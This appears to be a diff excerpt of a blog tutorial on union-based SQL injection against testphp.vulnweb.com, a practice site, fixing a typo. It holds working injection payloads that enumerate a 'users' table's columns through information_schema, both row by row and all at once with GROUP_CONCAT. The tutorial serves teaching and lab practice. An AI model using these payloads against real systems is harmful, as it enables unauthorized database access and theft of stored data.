0xVenus/0xVenus.github.io/posts/tutorials/Union_Based_SQLi.md

 ```http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='users' limit 0,1```

 Here i tried getting the columns in the *users* table

 NB: remember to keep increasing the number of limit after the query

 so to get the columns in a shot we can use

 ```(SELECT+GROUP_CONCAT(column_name+SEPARATOR+'::')+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+AND+TABLE_SCHEMA=DATABASE())```

-NB: set the value of the TABLE_NAME= to the table you are t5rying to get it columns
+NB: set the value of the TABLE_NAME= to the table you are trying to get its columns

 ![image](https://github.com/0xVenus/0xVenus.github.io/assets/97831939/c70af46f-e483-4d4e-a33a-88a78bd5524e)